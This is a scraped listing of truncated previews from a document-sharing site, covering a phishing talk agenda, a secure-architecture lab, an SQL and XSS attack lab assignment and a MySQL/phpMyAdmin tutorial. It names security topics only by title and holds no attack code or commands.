Phishing Stories Shaun Jones Agenda What is Phishing? Phishing Story I Intranets are actually pretty useful Phishing Story II Why do I need two factor auth Phishing Story III Everybody gets shells! What
More informationLab 1: Creating Secure Architectures (Revision)
Lab 1: Creating Secure Architectures (Revision) A Challenge Our challenge is to setup MyBank Incorp, where each of you will be allocated a network and hosts to configure and get on-line (Figure 1). For
More informationWeb Attacks Lab. 35 Points Group Lab Due Date: Lesson 16
CS482 SQL and XSS Attack Lab AY172 1 Web Attacks Lab 35 Points Group Lab Due Date: Lesson 16 Derived from c 2006-2014 Wenliang Du, Syracuse University. Do not redistribute with explicit consent from MAJ
More informationMysql Tutorial Create Database Username Password Through Phpmyadmin
Mysql Tutorial Create Database Username Password Through Phpmyadmin Convert plain text to MD5 Hash and edit your MySQL Database. Every WordPress blog uses a MySQL Database which can be accessed through
More information